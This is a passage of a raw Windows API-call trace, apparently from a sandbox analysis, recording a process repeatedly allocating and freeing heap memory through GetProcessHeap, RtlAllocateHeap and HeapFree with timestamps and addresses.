GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.159] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.160] GetProcessHeap () returned 0x280000 [0058.160] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.160] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.161] GetProcessHeap () returned 0x280000 [0058.161] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.161] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.162] GetProcessHeap () returned 0x280000 [0058.162] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.162] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.163] GetProcessHeap () returned 0x280000 [0058.163] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.163] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.164] GetProcessHeap () returned 0x280000 [0058.164] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.164] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.165] GetProcessHeap () returned 0x280000 [0058.165] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.165] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.166] GetProcessHeap () returned 0x280000 [0058.166] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.167] GetProcessHeap () returned 0x280000 [0058.167] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.406] GetProcessHeap () returned 0x280000 [0058.406] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.422] GetProcessHeap () returned 0x280000 [0058.422] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.423] GetProcessHeap () returned 0x280000 [0058.423] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 